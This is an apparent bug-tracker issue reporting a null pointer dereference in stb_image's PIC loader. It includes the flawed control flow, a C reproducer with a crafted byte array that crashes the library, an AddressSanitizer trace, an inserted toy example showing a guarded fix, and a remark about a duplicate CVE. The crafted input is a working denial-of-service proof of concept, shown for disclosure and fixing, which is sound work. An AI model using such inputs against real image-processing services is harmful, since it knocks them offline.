Open JarLob opened 8 months ago
A crafted image file can trigger a null pointer access in `stbi__convert_format` where `src` is null. It happens when `stbi__pic_load_core` in `stbi__pic_load` fails: the `result` is set to zero [1], but the flow continues [2].
```c
if (!stbi__pic_load_core(s,x,y,comp, result)) {
   STBI_FREE(result);
   result=0; // [1]
}
*px = x;
*py = y;
if (req_comp == 0) req_comp = *comp;
result=stbi__convert_format(result,4,req_comp,x,y); // [2]
```
This issue may lead to denial of service.
To reproduce the issue:
```c
#include <stdint.h>
#define STB_IMAGE_IMPLEMENTATION
#include "../stb_image.h"

int main(int argc, char* argv[]) {
    const uint8_t data[] = {0x53,0x80,0xf6,0x34,0x00,0x00,0x00,0x00,0x00,0x00,
                            0x00,0x00,0x40,0x00,0x08,0x01,0x20,0xff,0x10,0x40,
                            0x74,0x72,0x74,0x65,0x69,0xab,0x4c,0x65,0x31,0x6e,
                            0x20,0x62,0x79,0x20,0x6d,0x65,0x6e,0x74,0x61,0x6c,
                            0x20,0x69,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x50,
                            0x49,0x43,0x54,0x00,0x50,0x49,0x43,0x57,0x00,0x00,
                            0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,
                            0x08,0x01,0x20,0xff,0x10,0x6e,0x74,0x61,0x6c,0x20,
                            0x69,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x50,0x49,
                            0x43,0x54,0x00,0x50,0x54,0x20,0x10};
    size_t size = sizeof(data);
    int x, y, z, channels;
    stbi_uc *img = stbi_load_from_memory(data, size, &x, &y, &channels, 2);
    stbi_image_free(img);
    return 0;
}
```
```
==183891==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x0000004f944d bp 0x7ffefb18fe50 sp 0x7ffefb18fa00 T0)
==183891==The signal is caused by a READ memory access.
==183891==Hint: address points to the zero page.
    #0 0x4f944d in stbi__convert_format(unsigned char*, int, int, unsigned int, unsigned int) tests/../stb_image.h:1786:52
    #1 0x4ecdbe in stbi__pic_load(stbi__context*, int*, int*, int*, int, stbi__result_info*) tests/../stb_image.h:6535:11
    #2 0x4e463b in stbi__load_main(stbi__context*, int*, int*, int*, int, stbi__result_info*, int) tests/../stb_image.h:1159:35
    #3 0x4dc48f in stbi__load_and_postprocess_8bit(stbi__context*, int*, int*, int*, int) tests/../stb_image.h:1261:19
    #4 0x4de334 in stbi_load_from_memory tests/../stb_image.h:1431:11
```
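The control-flow defect above is the loader continuing after the core decoder fails, so the converter receives a null buffer. The following is an added example, not stb_image code and not the reporter's: it uses toy stand-ins (`toy_pic_load_core`, `toy_convert_format`, `toy_pic_load`, all hypothetical names) and a constructed mini "PIC" layout (byte 0 = validity flag, bytes 1 and 2 = width and height, then RGBA pixels) to show the two mitigations a reviewer would want in this path: the loader returns immediately when the core load fails, and the converter rejects a null source instead of dereferencing it.

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Toy stand-ins, constructed for this example (not stb_image code).
 * Mini "PIC" layout: data[0] = validity flag, data[1] = width, data[2] = height,
 * followed by width*height*4 bytes of RGBA. */
typedef unsigned char uc;

/* Mirrors the stbi__pic_load_core contract: fills *result (4 channels),
 * returns 1 on success and 0 on failure. */
static int toy_pic_load_core(const uc *data, size_t len, int x, int y, uc *result)
{
    size_t need = (size_t)x * (size_t)y * 4;
    if (len < 3 || data[0] == 0 || len - 3 < need)
        return 0;
    memcpy(result, data + 3, need);
    return 1;
}

/* Mirrors stbi__convert_format(data, 4, req_comp, x, y) for req_comp 1..4.
 * The null guard is the defensive check: a null src yields NULL, not a SEGV.
 * On success the input buffer is consumed (freed) unless returned unchanged. */
static uc *toy_convert_format(uc *data, int img_n, int req_comp, unsigned x, unsigned y)
{
    if (!data || img_n != 4 || req_comp < 1 || req_comp > 4)
        return NULL;
    if (req_comp == img_n)
        return data;
    size_t npix = (size_t)x * (size_t)y;
    uc *out = malloc(npix * (size_t)req_comp);
    if (!out) { free(data); return NULL; }
    for (size_t i = 0; i < npix; i++) {
        const uc *p = data + i * 4;
        uc gray = (uc)((p[0] * 77 + p[1] * 150 + p[2] * 29) >> 8);
        switch (req_comp) {
        case 1: out[i] = gray; break;
        case 2: out[i * 2] = gray; out[i * 2 + 1] = p[3]; break;
        case 3: memcpy(out + i * 3, p, 3); break;
        }
    }
    free(data);
    return out;
}

/* Fixed loader flow: a failed core load returns NULL right away, so a null
 * buffer is never handed to the converter. */
static uc *toy_pic_load(const uc *data, size_t len, int *px, int *py, int *comp, int req_comp)
{
    if (len < 3) return NULL;
    int x = data[1], y = data[2];
    if (x == 0 || y == 0) return NULL;
    uc *result = malloc((size_t)x * (size_t)y * 4);
    if (!result) return NULL;
    if (!toy_pic_load_core(data, len, x, y, result)) {
        free(result);
        return NULL;   /* bail out here instead of setting result=0 and continuing */
    }
    *px = x; *py = y; *comp = 4;
    if (req_comp == 0) req_comp = *comp;
    return toy_convert_format(result, 4, req_comp, (unsigned)x, (unsigned)y);
}

/* Constructed inputs: one that fails the core load, one 2x1 RGBA image. */
static const uc kBadPic[]  = { 0x00, 0x02, 0x01, 0xff,0,0,0xff, 0,0,0xff,0x80 };
static const uc kGoodPic[] = { 0x01, 0x02, 0x01, 0xff,0,0,0xff, 0,0,0xff,0x80 };

/* Returns 1 if the hardened path behaves as intended, 0 otherwise. */
static int toy_selftest(void)
{
    int x = 0, y = 0, comp = 0;
    if (toy_pic_load(kBadPic, sizeof kBadPic, &x, &y, &comp, 2) != NULL)
        return 0;                               /* bad input must yield NULL, not a crash */
    uc *img = toy_pic_load(kGoodPic, sizeof kGoodPic, &x, &y, &comp, 2);
    if (!img || x != 2 || y != 1 || comp != 4)
        return 0;
    /* gray(255,0,0) = 76, alpha 255; gray(0,0,255) = 28, alpha 128 */
    int ok = img[0] == 76 && img[1] == 255 && img[2] == 28 && img[3] == 128;
    free(img);
    return ok;
}

int main(void)
{
    return toy_selftest() ? 0 : 1;
}
```

Two independent guards are used on purpose: fixing the caller removes this crash, while the null check in the converter protects every other format-specific loader that might reach `stbi__convert_format` with a failed result.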
Looks like it collided with https://github.com/nothings/stb/issues/1521 which has CVE-2023-43898 assigned to it. I'll request to withdraw the CVE-2023-45665.